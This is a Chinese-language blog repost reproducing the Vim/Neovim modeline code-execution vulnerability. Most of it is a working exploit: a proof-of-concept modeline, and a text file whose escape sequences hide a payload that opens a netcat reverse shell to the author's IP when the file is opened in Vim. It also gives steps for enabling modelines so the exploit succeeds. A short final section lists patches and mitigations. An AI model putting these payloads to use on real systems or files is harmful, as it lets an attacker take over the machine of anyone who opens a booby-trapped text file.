关注我们

丢给你一个txt并同时获取你shell

日常无视黑桃日常无视黑桃 安全文摘 2019-06-09 121898 0

听闻很多人知道这个漏洞,但是有一部分人能复现成功,一部分人复现不出来。这里我就我自己的复现经历给大家演示一下。

git clone https://github.com/numirias/security.git

0x01:复现

 1、kali复现

    桌面新建立一个poc.txt放入以下代码,并用vim执行。

  代码:

:!uname -a||"vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

效果图:

丢给你一个txt并同时获取你shell

成功执行

    反弹shell脚本

    新建立一个shell.txt放入以下代码,Ip跟端口改成你自己的,并用vim执行。

    代码:

\x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup nc 192.168.124.14 6666 -e /bin/sh &\') | redraw! | file | silent! #"vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n

执行后报错:

丢给你一个txt并同时获取你shell

提示:处理模型行时检测到错误!!

处理方式:

丢给你一个txt并同时获取你shell

丢给你一个txt并同时获取你shell

在50行这里添加一个“set modeline” 然后esc保存退出,然后执行

source ~/.vimrc让它生效。

本地开启监听

丢给你一个txt并同时获取你shell

kali用vim执行txt

丢给你一个txt并同时获取你shell

本机得到shell

丢给你一个txt并同时获取你shell

0x02:防范

  • Vim补丁8.1.1365 

    https://github.com/vim/vim/commit/5357552

  • Neovim补丁(在v0.3.6中发布)

    https://github.com/neovim/neovim/pull/10082

    https://github.com/neovim/neovim/releases/tag/v0.3.6

    除了修补之外,建议在vimrc(set nomodeline)中禁用model,使用securemodelines 插件,或者禁用modelineexpr(因为补丁8.1.1366,仅限Vim)以禁用model中的表达式。

文由微信公众号:洛米唯熊

版权声明

本文仅代表作者观点,不代表黑白网立场。
如文章侵犯了您的权利,请通过邮箱联系我们删除。
详情查看:版权纠纷
E-Mail:server@heibai.org

喜欢0发布评论

评论列表

发表评论

  • 昵称(必填)
  • 邮箱
  • 网址